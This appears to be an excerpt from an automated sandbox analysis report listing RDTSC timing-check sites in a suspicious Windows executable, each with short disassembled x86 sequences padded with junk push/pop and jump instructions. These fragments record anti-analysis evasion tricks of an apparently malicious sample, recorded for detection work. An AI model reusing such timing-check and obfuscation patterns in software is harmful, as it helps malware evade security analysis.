Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B4E911 second address: B4E92E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45622h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B4EEB4 second address: B4EF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push edi 0x0000000a jmp 00007FD934BC97E8h 0x0000000f pop edi 0x00000010 jmp 00007FD934BC97DBh 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jns 00007FD934BC97E8h 0x00000020 pop eax 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007FD934BC97D8h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 00000018h 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b and edx, 466FC953h 0x00000041 mov edi, dword ptr [ebp+122D2ABEh] 0x00000047 push 0821FC35h 0x0000004c pushad 0x0000004d jg 00007FD934BC97D8h 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B4EF3E second address: B4EF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B4EF42 second address: B4EF46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B4F31D second address: B4F372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007FD934C4561Ch 0x0000000e mov edi, dword ptr [ebp+122D1BA0h] 0x00000014 pop edx 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FD934C45618h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FD934C45620h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B4F372 second address: B4F37C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD934BC97D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B4F766 second address: B4F787 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD934C45616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d jno 00007FD934C45621h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B4F787 second address: B4F7BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push 0000001Eh 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FD934BC97D8h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 or dword ptr [ebp+12450E5Bh], edi 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jns 00007FD934BC97D8h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B35702 second address: B3571A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jnl 00007FD934C4561Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B3571A second address: B35727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007FD934BC97D8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B850C9 second address: B850CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B850CE second address: B85107 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007FD934BC97D6h 0x00000009 pop edi 0x0000000a pushad 0x0000000b jno 00007FD934BC97D6h 0x00000011 jbe 00007FD934BC97D6h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push esi 0x0000001b pushad 0x0000001c jmp 00007FD934BC97DEh 0x00000021 ja 00007FD934BC97D6h 0x00000027 popad 0x00000028 js 00007FD934BC97DEh 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B8554D second address: B85551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B85851 second address: B8586E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD934BC97D6h 0x0000000a jg 00007FD934BC97D6h 0x00000010 jmp 00007FD934BC97DCh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B8586E second address: B85873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B85873 second address: B8587B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B8587B second address: B85881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B8B0FE second address: B8B113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FD934BC97D6h 0x0000000c popad 0x0000000d ja 00007FD934BC97D8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B89FA5 second address: B89FAF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD934C45616h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B8A4E9 second address: B8A4ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B8A4ED second address: B8A4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B8A4F3 second address: B8A4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B89CE9 second address: B89CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B8AE57 second address: B8AE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD934BC97DAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B9471D second address: B9473E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop eax 0x0000000a pushad 0x0000000b jns 00007FD934C45622h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B948A4 second address: B948A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B948A8 second address: B948C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FD934C45620h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B94BB9 second address: B94BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B94FCF second address: B94FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B95291 second address: B95299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B95299 second address: B9529D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B9529D second address: B952A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B953F8 second address: B953FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B953FF second address: B95428 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD934BC97DEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jl 00007FD934BC97D6h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD934BC97E5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B956A1 second address: B956A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B956A5 second address: B956C4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD934BC97E9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B956C4 second address: B956D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jne 00007FD934C45616h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B983B6 second address: B983C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD934BC97D6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B983C6 second address: B983CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B98100 second address: B98105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B9ACF1 second address: B9AD0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934C45626h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B9AD0D second address: B9AD5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD934BC97E3h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FD934BC97DCh 0x0000001c popad 0x0000001d jp 00007FD934BC97DEh 0x00000023 pushad 0x00000024 popad 0x00000025 jne 00007FD934BC97D6h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B1222D second address: B1223C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FD934C45616h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: BA0761 second address: BA076B instructions: 0x00000000 rdtsc 0x00000002 js 00007FD934BC97D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: BA076B second address: BA0775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: BA0775 second address: BA077B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: BA08D7 second address: BA08DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: BA0D63 second address: BA0D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007FD934BC97D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B09AE2 second address: B09AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: BA40F4 second address: BA4111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD934BC97E3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: BA43D3 second address: BA43D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA43D9 second address: BA43F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FD934BC97D6h 0x0000000c popad 0x0000000d jmp 00007FD934BC97E2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA43F8 second address: BA4408 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD934C45618h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA4558 second address: BA456E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD934BC97DEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA46DE second address: BA46FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FD934C45622h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA486E second address: BA4888 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FD934BC97E0h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA49C6 second address: BA49DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45621h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BAA379 second address: BAA37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BAA37F second address: BAA385 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B08187 second address: B0818B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA8CCA second address: BA8CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA8CD0 second address: BA8CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA8CD8 second address: BA8CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA8E18 second address: BA8E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA8E1E second address: BA8E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C45629h 0x00000009 popad 0x0000000a jmp 00007FD934C45629h 0x0000000f popad 0x00000010 pushad 0x00000011 jnc 00007FD934C45622h 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007FD934C45616h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA915E second address: BA9198 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD934BC97EFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FD934BC97E3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA930E second address: BA934C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C45626h 0x00000009 pop eax 0x0000000a jp 00007FD934C4561Ch 0x00000010 jmp 00007FD934C4561Dh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA934C second address: BA9351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA962A second address: BA9647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C45628h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA9647 second address: BA964D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA964D second address: BA9653 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA9653 second address: BA965D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA965D second address: BA9661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA9661 second address: BA9665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BAFE33 second address: BAFE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BAFE39 second address: BAFE42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BAFE42 second address: BAFE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD934C45616h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BAFFDA second address: BAFFE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BAFFE0 second address: BB0023 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD934C45616h 0x00000008 jmp 00007FD934C45624h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FD934C4561Ch 0x00000019 jmp 00007FD934C45625h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB04D9 second address: BB04FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FD934BC97E3h 0x0000000d jg 00007FD934BC97D6h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB07B5 second address: BB07B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB138B second address: BB1391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB1391 second address: BB13B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007FD934C45616h 0x0000000f jmp 00007FD934C45628h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB13B9 second address: BB13E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD934BC97DFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB1705 second address: BB1720 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45623h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB1720 second address: BB1724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB1724 second address: BB1775 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007FD934C45616h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007FD934C45625h 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007FD934C45629h 0x0000001e pushad 0x0000001f jo 00007FD934C45616h 0x00000025 push eax 0x00000026 pop eax 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB19E7 second address: BB19EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB657D second address: BB6582 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
